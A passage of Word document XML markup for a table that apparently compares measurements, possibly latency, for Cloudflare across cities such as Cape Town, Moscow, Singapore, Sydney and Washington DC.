              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="43F75DD3" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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4EF861C1" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29CAFC10" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>702.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B34A835" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>738.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E25F482" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>813.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712217C9" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>827.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="0477372B" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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03D73F66" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73A7D410" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087F69DE" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>581.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B0D2D76" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>518.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6395CA1A" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>519</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="446515AE" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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6C8C196D" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B85C43" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB86550" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>505.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691361E9" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>599</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A01C29" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>511.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="76520933" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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74FD844E" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CC9AB35" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>423.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB9E84C" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>433.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A116F7F" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>620.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EF2457" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>696.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="31F18E5B" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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4437E370" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F1D078C" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>528.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B740C2" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>420.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C3BFD1D" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>434.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
